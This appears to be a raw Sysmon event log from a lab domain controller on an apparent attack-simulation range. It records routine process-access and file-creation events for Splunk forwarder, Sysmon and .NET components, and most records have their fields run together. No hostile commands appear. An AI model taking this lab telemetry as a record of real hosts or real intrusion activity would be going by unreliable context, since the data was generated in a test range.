EventID=23 Version=5 Level=4 Task=23 Opcode=0 Keywords=0x8000000000000000 EventRecordID=22525 Channel=Microsoft-Windows-Sysmon/Operational Computer=win-dc-663.attackrange.local RuleName=- UtcTime=2021-06-23 21:06:53.733 ProcessGuid={4DB9351A-9DFF-60D3-7600-00000000CF01} ProcessId=3068 User=NT AUTHORITY\SYSTEM Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security Hashes=MD5=CDAFD0CBEB236B0D308876C4160B5A79,SHA256=924C16CBF495CADD6F3E0412123D1E05512586E80CC0E7D85915061C0D44AB72,IMPHASH=00000000000000000000000000000000 IsExecutable=false Archived=true
EventID=10 Version=3 Level=4 Task=10 Opcode=0 Keywords=0x8000000000000000 EventRecordID=22524 Channel=Microsoft-Windows-Sysmon/Operational Computer=win-dc-663.attackrange.local RuleName=- UtcTime=2021-06-23 21:06:53.673 SourceProcessGUID={4DB9351A-9DDD-60D3-0C00-00000000CF01} SourceProcessId+SourceThreadId=844876 SourceImage=C:\Windows\system32\svchost.exe TargetProcessGUID={4DB9351A-A26D-60D3-2205-00000000CF01} TargetProcessId=7024 TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe GrantedAccess=0x1000 CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventID=10 Version=3 Level=4 Task=10 Opcode=0 Keywords=0x8000000000000000 EventRecordID=22523 Channel=Microsoft-Windows-Sysmon/Operational Computer=win-dc-663.attackrange.local RuleName=- UtcTime=2021-06-23 21:06:53.640 SourceProcessGUID={4DB9351A-9DDD-60D3-0C00-00000000CF01} SourceProcessId+SourceThreadId=844876 SourceImage=C:\Windows\system32\svchost.exe TargetProcessGUID={4DB9351A-9DEA-60D3-2E00-00000000CF01} TargetProcessId=8 TargetImage=C:\Windows\sysmon64.exe GrantedAccess=0x1400 CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventID=10 Version=3 Level=4 Task=10 Opcode=0 Keywords=0x8000000000000000 EventRecordID=22522 Channel=Microsoft-Windows-Sysmon/Operational Computer=win-dc-663.attackrange.local RuleName=- UtcTime=2021-06-23 21:06:53.640 SourceProcessGUID={4DB9351A-9DDD-60D3-0C00-00000000CF01} SourceProcessId+SourceThreadId=844876 SourceImage=C:\Windows\system32\svchost.exe TargetProcessGUID={4DB9351A-9DEA-60D3-2E00-00000000CF01} TargetProcessId=8 TargetImage=C:\Windows\sysmon64.exe GrantedAccess=0x1400 CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventID=10 Version=3 Level=4 Task=10 Opcode=0 Keywords=0x8000000000000000 EventRecordID=22521 Channel=Microsoft-Windows-Sysmon/Operational Computer=win-dc-663.attackrange.local RuleName=- UtcTime=2021-06-23 21:06:53.640 SourceProcessGUID={4DB9351A-9DDD-60D3-0C00-00000000CF01} SourceProcessId+SourceThreadId=844876 SourceImage=C:\Windows\system32\svchost.exe TargetProcessGUID={4DB9351A-9DEA-60D3-2E00-00000000CF01} TargetProcessId=8 TargetImage=C:\Windows\sysmon64.exe GrantedAccess=0x1400 CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventID=10 Version=3 Level=4 Task=10 Opcode=0 Keywords=0x8000000000000000 EventRecordID=22520 Channel=Microsoft-Windows-Sysmon/Operational Computer=win-dc-663.attackrange.local RuleName=- UtcTime=2021-06-23 (record continues on the following line)
21:06:53.640{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022519Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:53.640{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A26D-60D3-2305-00000000CF01}6900C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022518Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:53.608{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A26D-60D3-2305-00000000CF01}6900C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022517Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:53.608{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A26D-60D3-2305-00000000CF01}6900C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000022516Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:53.618{4DB9351A-A26D-60D3-2305-00000000CF01}6900C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
10341000x800000000000000022515Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:53.593{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A26D-60D3-2205-00000000CF01}7024C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022514Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:53.580{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A26D-60D3-2205-00000000CF01}7024C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Micro
soft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022513Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:53.580{4DB9351A-A26C-60D3-2005-00000000CF01}4352NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\6ABGDLHVSY\System.Runtime.Serialization.ni.dll.auxMD5=F0A443928F6B26BA650A6E03119EC1DB,SHA256=2B7697858567703EC98012F2CAB1362AE1F12B0400927D712EAF70360B98F247,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022512Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:53.580{4DB9351A-A26C-60D3-2005-00000000CF01}4352NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\6ABGDLHVSY\System.Runtime.Serialization.ni.dllMD5=AB184B9B5B27E1D16DEC49AF25D626CC,SHA256=F87F1D5873AC30887C8978BD0D6C8780B14B49F9595D18D47524C1BA9EC6D95C,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000022511Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:53.301{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E216F441D75D235239D30AE7FBC5220,SHA256=273C362A5F49A414151A272EBF2C10ED17A2946C49CE178493D8D19EC48FB614,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022510Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:53.186{4DB9351A-9DDD-60D3-0C00-00000000CF01}844884C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000022509Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:53.186{4DB9351A-9DDD-60D3-0C00-00000000CF01}844884C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000022508Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:53.186{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000022507Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:53.186{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 23542300x800000000000000022506Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:53.108{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4AF49DC34976838FFE0C26FA58AB1512,SHA256=72500DB3B65014DA01A150003D77EC9D27AF813C5A3A45D92F790128FF62C4BB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022505Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:53.030{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A26C-60D3-2005-00000000CF01}4352C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022537Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:54.484{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A26E-60D3-2405-00000000CF01}6096C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022536Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:54.484{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022535Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:54.484{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022534Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:54.484{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022533Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 